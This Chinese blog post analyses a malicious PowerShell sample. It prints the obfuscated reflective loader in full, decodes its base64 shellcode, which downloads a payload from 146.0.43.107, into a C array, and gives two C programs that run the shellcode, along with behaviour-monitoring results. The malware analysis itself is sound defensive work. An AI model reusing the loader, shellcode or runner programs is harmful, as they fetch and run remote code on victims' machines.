本文链接网址:http://blog.csdn.net/qq1084283172/article/details/45690529
一、事件回放
网络管理员在服务器上通过网络监控软件检测到,有程序在不断向外发包,并且ip地址显示国外的区域,经过相关安全工程师的分析和定位,最确定是微软操作系统上的Power Shell程序出现异常。发现的这个Power Shell程序和微软操作系统上的Power Shell程序不同,出现异常的这个Power Shell会不断的向外发包。经过该安全工程师的分析和反编译程序,最终得到了下面这段关键的代码,其中黄色部分的代码是最为关键的,后面会对这段代码进行解释和分析:
function eioVqZzdV {
Param ($eoSKcVTjfxS, $p0d9j)
$f4Al9fb6 = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
return $f4Al9fb6.GetMethod('GetProcAddress').Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($f4Al9fb6.GetMethod('GetModuleHandle')).Invoke($null, @($eoSKcVTjfxS)))), $p0d9j))
}
function mGIgrD {
Param (
[Parameter(Position = 0, Mandatory = $True)] [Type[]] $ejQ7pbH8K,
[Parameter(Position = 1)] [Type] $za4NhlFE = [Void]
)
$lqSy6La = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
$lqSy6La.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $ejQ7pbH8K).SetImplementationFlags('Runtime, Managed')
$lqSy6La.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $za4NhlFE, $ejQ7pbH8K).SetImplementationFlags('Runtime, Managed')
return $lqSy6La.CreateType()
}
[Byte[]]$umdAM8XBH = [System.Convert]::FromBase64String("/OiJAAAAYInlMdJki1Iwi1IMi1IUi3IoD7dKJjH/McCsPGF8Aiwgwc8NAcfi8FJXi1IQi0I8AdCLQHiFwHRKAdBQi0gYi
1ggAdPjPEmLNIsB1jH/McCswc8NAcc44HX0A334O30kdeJYi1gkAdNmiwxLi1gcAdOLBIsB0IlEJCRbW2FZWlH/4FhfWosS64ZdaG5ldABod2luaVRoTHcmB//V6IAAAABNb3ppbGxhLzUuMCAoY29
tcGF0aWJsZTsgTVNJRSAxMC4wOyBXaW5kb3dzIE5UIDYuMjsgV09XNjQ7IFRyaWRlbnQvNi4wOyBUb3VjaDsgTUFTUEpTKQBYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYA
Fkx/1dXV1dRaDpWeaf/1et5WzHJUVFqA1FRaFAAAABTUGhXiZ/G/9XrYlkx0lJoAAJghFJSUlFSUGjrVS47/9WJxjH/V1dXV1ZoLQYYe//VhcB0RDH/hfZ0BIn56wloqsXiXf/VicFoRSFeMf/VMf9
XagdRVlBot1fgC//VvwAvAAA5x3S8Mf/rFetJ6Jn///8vaGZZbgAAaPC1olb/1WpAaAAQAABoAABAAFdoWKRT5f/Vk1NTiedXaAAgAABTVmgSloni/9WFwHTNiwcBw4XAdeVYw+g3////MTQ2LjAuN
DMuMTA3AA==")
$ro8d50FQZ0 = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((eioVqZzdV kernel32.dll VirtualAlloc), (mGIgrD @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $umdAM8XBH.Length,0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($umdAM8XBH, 0, $ro8d50FQZ0, $umdAM8XBH.length)
$mLkBWmZ3 = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((eioVqZzdV kernel32.dll CreateThread), (mGIgrD @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$ro8d50FQZ0,[IntPtr]::Zero,0,[IntPtr]::Zero)
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((eioVqZzdV kernel32.dll WaitForSingleObject), (mGIgrD @([IntPtr], [Int32]))).Invoke($mLkBWmZ3,0xffffffff) | Out-Null
二、对反编译关键代码的注释
//Base64编码的字符串数组$umdAM8XBH
[Byte[]]$umdAM8XBH =[System.Convert]::FromBase64String("/OiJAAAAYInlMdJki1Iwi1IMi1IUi3IoD7dKJjH/McCsPGF8Aiwgwc8NAcfi8FJXi1IQi0I8AdCLQHiFwHRKAdBQi0gYi
1ggAdPjPEmLNIsB1jH/McCswc8NAcc44HX0A334O30kdeJYi1gkAdNmiwxLi1gcAdOLBIsB0IlEJCRbW2FZWlH/4FhfWosS64ZdaG5ldABod2luaVRoTHcmB//V6IAAAABNb3ppbGxhLzUuMCAoY29
tcGF0aWJsZTsgTVNJRSAxMC4wOyBXaW5kb3dzIE5UIDYuMjsgV09XNjQ7IFRyaWRlbnQvNi4wOyBUb3VjaDsgTUFTUEpTKQBYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYA
Fkx/1dXV1dRaDpWeaf/1et5WzHJUVFqA1FRaFAAAABTUGhXiZ/G/9XrYlkx0lJoAAJghFJSUlFSUGjrVS47/9WJxjH/V1dXV1ZoLQYYe//VhcB0RDH/hfZ0BIn56wloqsXiXf/VicFoRSFeMf/VMf9
XagdRVlBot1fgC//VvwAvAAA5x3S8Mf/rFetJ6Jn///8vaGZZbgAAaPC1olb/1WpAaAAQAABoAABAAFdoWKRT5f/Vk1NTiedXaAAgAABTVmgSloni/9WFwHTNiwcBw4XAdeVYw+g3////MTQ2LjAuN
DMuMTA3AA==")
//调用kernel32.dll库的函数VirtualAlloc在进程堆上分配0x3000大小的内存空间,$ro8d50FQZ0保存申请内存空间的地址
$ro8d50FQZ0 = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((eioVqZzdV kernel32.dll VirtualAlloc), (mGIgrD @([IntPtr], [UInt32], [UInt32],[UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $umdAM8XBH.Length,0x3000, 0x40)
//调用函数Copy从数组$umdAM8XBH中拷贝字符串到新申请的内存空间$ro8d50FQZ0中
[System.Runtime.InteropServices.Marshal]::Copy($umdAM8XBH, 0, $ro8d50FQZ0, $umdAM8XBH.length)
//调用kernel32.dll库中函数CreateThread创建线程,并且线程的回调函数的地址为数组$ro8d50FQZ0的字符串地址
$mLkBWmZ3 = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((eioVqZzdV kernel32.dll CreateThread), (mGIgrD @([IntPtr], [UInt32], [IntPtr],[IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$ro8d50FQZ0,[IntPtr]::Zero,0,[IntPtr]::Zero)
//调用kernel32.dll库中的函数WaitForSingleObject等待线程的创建成功
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((eioVqZzdV kernel32.dll WaitForSingleObject), (mGIgrD @([IntPtr],[Int32]))).Invoke($mLkBWmZ3,0xffffffff) | Out-Null
二、黄色部分Base64字符串的解码
//很明显数组$umdAM8XBH中的字符是ShellCode代码但是需要先Base64解码:
[Byte[]]$umdAM8XBH =[System.Convert]::FromBase64String("/OiJAAAAYInlMdJki1Iwi1IMi1IUi3IoD7dKJjH/McCsPGF8Aiwgwc8NAcfi8FJXi1IQi0I8AdCLQHiFwHRKAdBQi0gYi
1ggAdPjPEmLNIsB1jH/McCswc8NAcc44HX0A334O30kdeJYi1gkAdNmiwxLi1gcAdOLBIsB0IlEJCRbW2FZWlH/4FhfWosS64ZdaG5ldABod2luaVRoTHcmB//V6IAAAABNb3ppbGxhLzUuMCAoY29
tcGF0aWJsZTsgTVNJRSAxMC4wOyBXaW5kb3dzIE5UIDYuMjsgV09XNjQ7IFRyaWRlbnQvNi4wOyBUb3VjaDsgTUFTUEpTKQBYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYA
Fkx/1dXV1dRaDpWeaf/1et5WzHJUVFqA1FRaFAAAABTUGhXiZ/G/9XrYlkx0lJoAAJghFJSUlFSUGjrVS47/9WJxjH/V1dXV1ZoLQYYe//VhcB0RDH/hfZ0BIn56wloqsXiXf/VicFoRSFeMf/VMf9
XagdRVlBot1fgC//VvwAvAAA5x3S8Mf/rFetJ6Jn///8vaGZZbgAAaPC1olb/1WpAaAAQAABoAABAAFdoWKRT5f/Vk1NTiedXaAAgAABTVmgSloni/9WFwHTNiwcBw4XAdeVYw+g3////MTQ2LjAuN
DMuMTA3AA==")
黄色部分的字符串的解码
Base64编码字符串在线解码的网址:http://www1.tc711.com/tool/BASE64.htm
1.Base64字符串解码成字符串--显然这种解码方式是不对的
2.其实这段Base64加密的编码解密出来是一段ShellCode也就是一段可执行代码不是一个Http的发送包。
char shellCode[] =
"\xfc\xe8\x89\x00\x00\x00\x60\x89"
"\xe5\x31\xd2\x64\x8b\x52\x30\x8b"
"\x52\x0c\x8b\x52\x14\x8b\x72\x28"
"\x0f\xb7\x4a\x26\x31\xff\x31\xc0"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1"
"\xcf\x0d\x01\xc7\xe2\xf0\x52\x57"
"\x8b\x52\x10\x8b\x42\x3c\x01\xd0"
"\x8b\x40\x78\x85\xc0\x74\x4a\x01"
"\xd0\x50\x8b\x48\x18\x8b\x58\x20"
"\x01\xd3\xe3\x3c\x49\x8b\x34\x8b"
"\x01\xd6\x31\xff\x31\xc0\xac\xc1"
"\xcf\x0d\x01\xc7\x38\xe0\x75\xf4"
"\x03\x7d\xf8\x3b\x7d\x24\x75\xe2"
"\x58\x8b\x58\x24\x01\xd3\x66\x8b"
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
"\x04\x8b\x01\xd0\x89\x44\x24\x24"
"\x5b\x5b\x61\x59\x5a\x51\xff\xe0"
"\x58\x5f\x5a\x8b\x12\xeb\x86\x5d"
"\x68\x6e\x65\x74\x00\x68\x77\x69"
"\x6e\x69\x54\x68\x4c\x77\x26\x07"
"\xff\xd5\xe8\x80\x00\x00\x00\x4d"
"\x6f\x7a\x69\x6c\x6c\x61\x2f\x35"
"\x2e\x30\x20\x28\x63\x6f\x6d\x70"
"\x61\x74\x69\x62\x6c\x65\x3b\x20"
"\x4d\x53\x49\x45\x20\x31\x30\x2e"
"\x30\x3b\x20\x57\x69\x6e\x64\x6f"
"\x77\x73\x20\x4e\x54\x20\x36\x2e"
"\x32\x3b\x20\x57\x4f\x57\x36\x34"
"\x3b\x20\x54\x72\x69\x64\x65\x6e"
"\x74\x2f\x36\x2e\x30\x3b\x20\x54"
"\x6f\x75\x63\x68\x3b\x20\x4d\x41"
"\x53\x50\x4a\x53\x29\x00\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x00\x59"
"\x31\xff\x57\x57\x57\x57\x51\x68"
"\x3a\x56\x79\xa7\xff\xd5\xeb\x79"
"\x5b\x31\xc9\x51\x51\x6a\x03\x51"
"\x51\x68\x50\x00\x00\x00\x53\x50"
"\x68\x57\x89\x9f\xc6\xff\xd5\xeb"
"\x62\x59\x31\xd2\x52\x68\x00\x02"
"\x60\x84\x52\x52\x52\x51\x52\x50"
"\x68\xeb\x55\x2e\x3b\xff\xd5\x89"
"\xc6\x31\xff\x57\x57\x57\x57\x56"
"\x68\x2d\x06\x18\x7b\xff\xd5\x85"
"\xc0\x74\x44\x31\xff\x85\xf6\x74"
"\x04\x89\xf9\xeb\x09\x68\xaa\xc5"
"\xe2\x5d\xff\xd5\x89\xc1\x68\x45"
"\x21\x5e\x31\xff\xd5\x31\xff\x57"
"\x6a\x07\x51\x56\x50\x68\xb7\x57"
"\xe0\x0b\xff\xd5\xbf\x00\x2f\x00"
"\x00\x39\xc7\x74\xbc\x31\xff\xeb"
"\x15\xeb\x49\xe8\x99\xff\xff\xff"
"\x2f\x68\x66\x59\x6e\x00\x00\x68"
"\xf0\xb5\xa2\x56\xff\xd5\x6a\x40"
"\x68\x00\x10\x00\x00\x68\x00\x00"
"\x40\x00\x57\x68\x58\xa4\x53\xe5"
"\xff\xd5\x93\x53\x53\x89\xe7\x57"
"\x68\x00\x20\x00\x00\x53\x56\x68"
"\x12\x96\x89\xe2\xff\xd5\x85\xc0"
"\x74\xcd\x8b\x07\x01\xc3\x85\xc0"
"\x75\xe5\x58\xc3\xe8\x37\xff\xff"
"\xff\x31\x34\x36\x2e\x30\x2e\x34"
"\x33\x2e\x31\x30\x37\x00 ";
三、ShellCode代码行为的分析
1.编写测试测试程序,对ShellCode的行为进行分析
ShellCode测试程序1--TestCode:
// TestCode.cpp : Defines the entry point for the console application. // #include "stdafx.h" char shellCode[] = "\xfc\xe8\x89\x00\x00\x00\x60\x89" "\xe5\x31\xd2\x64\x8b\x52\x30\x8b" "\x52\x0c\x8b\x52\x14\x8b\x72\x28" "\x0f\xb7\x4a\x26\x31\xff\x31\xc0" "\xac\x3c\x61\x7c\x02\x2c\x20\xc1" "\xcf\x0d\x01\xc7\xe2\xf0\x52\x57" "\x8b\x52\x10\x8b\x42\x3c\x01\xd0" "\x8b\x40\x78\x85\xc0\x74\x4a\x01" "\xd0\x50\x8b\x48\x18\x8b\x58\x20" "\x01\xd3\xe3\x3c\x49\x8b\x34\x8b" "\x01\xd6\x31\xff\x31\xc0\xac\xc1" "\xcf\x0d\x01\xc7\x38\xe0\x75\xf4" "\x03\x7d\xf8\x3b\x7d\x24\x75\xe2" "\x58\x8b\x58\x24\x01\xd3\x66\x8b" "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b" "\x04\x8b\x01\xd0\x89\x44\x24\x24" "\x5b\x5b\x61\x59\x5a\x51\xff\xe0" "\x58\x5f\x5a\x8b\x12\xeb\x86\x5d" "\x68\x6e\x65\x74\x00\x68\x77\x69" "\x6e\x69\x54\x68\x4c\x77\x26\x07" "\xff\xd5\xe8\x80\x00\x00\x00\x4d" "\x6f\x7a\x69\x6c\x6c\x61\x2f\x35" "\x2e\x30\x20\x28\x63\x6f\x6d\x70" "\x61\x74\x69\x62\x6c\x65\x3b\x20" "\x4d\x53\x49\x45\x20\x31\x30\x2e" "\x30\x3b\x20\x57\x69\x6e\x64\x6f" "\x77\x73\x20\x4e\x54\x20\x36\x2e" "\x32\x3b\x20\x57\x4f\x57\x36\x34" "\x3b\x20\x54\x72\x69\x64\x65\x6e" "\x74\x2f\x36\x2e\x30\x3b\x20\x54" "\x6f\x75\x63\x68\x3b\x20\x4d\x41" "\x53\x50\x4a\x53\x29\x00\x58\x58" "\x58\x58\x58\x58\x58\x58\x58\x58" "\x58\x58\x58\x58\x58\x58\x58\x58" "\x58\x58\x58\x58\x58\x58\x58\x58" "\x58\x58\x58\x58\x58\x58\x58\x58" "\x58\x58\x58\x58\x58\x58\x00\x59" "\x31\xff\x57\x57\x57\x57\x51\x68" "\x3a\x56\x79\xa7\xff\xd5\xeb\x79" "\x5b\x31\xc9\x51\x51\x6a\x03\x51" "\x51\x68\x50\x00\x00\x00\x53\x50" "\x68\x57\x89\x9f\xc6\xff\xd5\xeb" "\x62\x59\x31\xd2\x52\x68\x00\x02" "\x60\x84\x52\x52\x52\x51\x52\x50" "\x68\xeb\x55\x2e\x3b\xff\xd5\x89" "\xc6\x31\xff\x57\x57\x57\x57\x56" "\x68\x2d\x06\x18\x7b\xff\xd5\x85" "\xc0\x74\x44\x31\xff\x85\xf6\x74" "\x04\x89\xf9\xeb\x09\x68\xaa\xc5" "\xe2\x5d\xff\xd5\x89\xc1\x68\x45" "\x21\x5e\x31\xff\xd5\x31\xff\x57" "\x6a\x07\x51\x56\x50\x68\xb7\x57" "\xe0\x0b\xff\xd5\xbf\x00\x2f\x00" "\x00\x39\xc7\x74\xbc\x31\xff\xeb" "\x15\xeb\x49\xe8\x99\xff\xff\xff" "\x2f\x68\x66\x59\x6e\x00\x00\x68" "\xf0\xb5\xa2\x56\xff\xd5\x6a\x40" "\x68\x00\x10\x00\x00\x68\x00\x00" "\x40\x00\x57\x68\x58\xa4\x53\xe5" "\xff\xd5\x93\x53\x53\x89\xe7\x57" "\x68\x00\x20\x00\x00\x53\x56\x68" "\x12\x96\x89\xe2\xff\xd5\x85\xc0" "\x74\xcd\x8b\x07\x01\xc3\x85\xc0" "\x75\xe5\x58\xc3\xe8\x37\xff\xff" "\xff\x31\x34\x36\x2e\x30\x2e\x34" "\x33\x2e\x31\x30\x37\x00 "; int main(int argc, char* argv[]) { __asm { lea eax, shellCode push eax ret } return 0; }
ShellCode测试程序2--TestCode1:
// TestCode1.cpp : Defines the entry point for the console application. // #include "stdafx.h" #include <windows.h> char shellCode[] = "\xfc\xe8\x89\x00\x00\x00\x60\x89" "\xe5\x31\xd2\x64\x8b\x52\x30\x8b" "\x52\x0c\x8b\x52\x14\x8b\x72\x28" "\x0f\xb7\x4a\x26\x31\xff\x31\xc0" "\xac\x3c\x61\x7c\x02\x2c\x20\xc1" "\xcf\x0d\x01\xc7\xe2\xf0\x52\x57" "\x8b\x52\x10\x8b\x42\x3c\x01\xd0" "\x8b\x40\x78\x85\xc0\x74\x4a\x01" "\xd0\x50\x8b\x48\x18\x8b\x58\x20" "\x01\xd3\xe3\x3c\x49\x8b\x34\x8b" "\x01\xd6\x31\xff\x31\xc0\xac\xc1" "\xcf\x0d\x01\xc7\x38\xe0\x75\xf4" "\x03\x7d\xf8\x3b\x7d\x24\x75\xe2" "\x58\x8b\x58\x24\x01\xd3\x66\x8b" "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b" "\x04\x8b\x01\xd0\x89\x44\x24\x24" "\x5b\x5b\x61\x59\x5a\x51\xff\xe0" "\x58\x5f\x5a\x8b\x12\xeb\x86\x5d" "\x68\x6e\x65\x74\x00\x68\x77\x69" "\x6e\x69\x54\x68\x4c\x77\x26\x07" "\xff\xd5\xe8\x80\x00\x00\x00\x4d" "\x6f\x7a\x69\x6c\x6c\x61\x2f\x35" "\x2e\x30\x20\x28\x63\x6f\x6d\x70" "\x61\x74\x69\x62\x6c\x65\x3b\x20" "\x4d\x53\x49\x45\x20\x31\x30\x2e" "\x30\x3b\x20\x57\x69\x6e\x64\x6f" "\x77\x73\x20\x4e\x54\x20\x36\x2e" "\x32\x3b\x20\x57\x4f\x57\x36\x34" "\x3b\x20\x54\x72\x69\x64\x65\x6e" "\x74\x2f\x36\x2e\x30\x3b\x20\x54" "\x6f\x75\x63\x68\x3b\x20\x4d\x41" "\x53\x50\x4a\x53\x29\x00\x58\x58" "\x58\x58\x58\x58\x58\x58\x58\x58" "\x58\x58\x58\x58\x58\x58\x58\x58" "\x58\x58\x58\x58\x58\x58\x58\x58" "\x58\x58\x58\x58\x58\x58\x58\x58" "\x58\x58\x58\x58\x58\x58\x00\x59" "\x31\xff\x57\x57\x57\x57\x51\x68" "\x3a\x56\x79\xa7\xff\xd5\xeb\x79" "\x5b\x31\xc9\x51\x51\x6a\x03\x51" "\x51\x68\x50\x00\x00\x00\x53\x50" "\x68\x57\x89\x9f\xc6\xff\xd5\xeb" "\x62\x59\x31\xd2\x52\x68\x00\x02" "\x60\x84\x52\x52\x52\x51\x52\x50" "\x68\xeb\x55\x2e\x3b\xff\xd5\x89" "\xc6\x31\xff\x57\x57\x57\x57\x56" "\x68\x2d\x06\x18\x7b\xff\xd5\x85" "\xc0\x74\x44\x31\xff\x85\xf6\x74" "\x04\x89\xf9\xeb\x09\x68\xaa\xc5" "\xe2\x5d\xff\xd5\x89\xc1\x68\x45" "\x21\x5e\x31\xff\xd5\x31\xff\x57" "\x6a\x07\x51\x56\x50\x68\xb7\x57" "\xe0\x0b\xff\xd5\xbf\x00\x2f\x00" "\x00\x39\xc7\x74\xbc\x31\xff\xeb" "\x15\xeb\x49\xe8\x99\xff\xff\xff" "\x2f\x68\x66\x59\x6e\x00\x00\x68" "\xf0\xb5\xa2\x56\xff\xd5\x6a\x40" "\x68\x00\x10\x00\x00\x68\x00\x00" "\x40\x00\x57\x68\x58\xa4\x53\xe5" "\xff\xd5\x93\x53\x53\x89\xe7\x57" "\x68\x00\x20\x00\x00\x53\x56\x68" "\x12\x96\x89\xe2\xff\xd5\x85\xc0" "\x74\xcd\x8b\x07\x01\xc3\x85\xc0" "\x75\xe5\x58\xc3\xe8\x37\xff\xff" "\xff\x31\x34\x36\x2e\x30\x2e\x34" "\x33\x2e\x31\x30\x37\x00 "; int main(int argc, char* argv[]) { //创建ShellCode的线程 HANDLE hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)(int)&shellCode, NULL, 0, NULL); //等待线程的创建完成 WaitForSingleObject(hThread, INFINITE); return 0; }
2. 使用病毒监控软件MyMonitor对ShellCode的行为进行监控,情况如下:
创建文件C:\Documentsand Settings\Administrator\Local Settings\Temporary InternetFiles\Content.IE5\index.dat
创建文件C:\Documentsand Settings\Administrator\Cookies\index.dat
创建文件C:\Documentsand Settings\Administrator\Local Settings\History\ History.IE5\index.dat
创建文件C:\AUTOEXEC.BAT
创建文件C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\b7e3_appcompat.txt
链接外网146.0.43.107:80,远程读取该网站中的文件146.0.43.107/hfYn到本地文件中。
3. 使用OD对程序进行动态分析
ShellCode的汇编是经过人工刻意编写的,懒得分析,我想多活几年,只提供部分ShellCode的截图:
4.使用金山火眼对样本进行分析
分析结果的网址:
http://fireeye.ijinshan.com/analyse.html?md5=232ddb4b262057145ce0b8930738b7fb&sha1=39ec762b497c51a28acb7c334a123c89ebd944dd&type=1#full
四、在线病毒扫描对样本的检测结果
病毒检测报告结果的网址:
http://r.virscan.org/report/8cb8acd2f0bce2b3ee34bcffc5657c8d
笔记到此为止,欢迎高手拍砖砸死。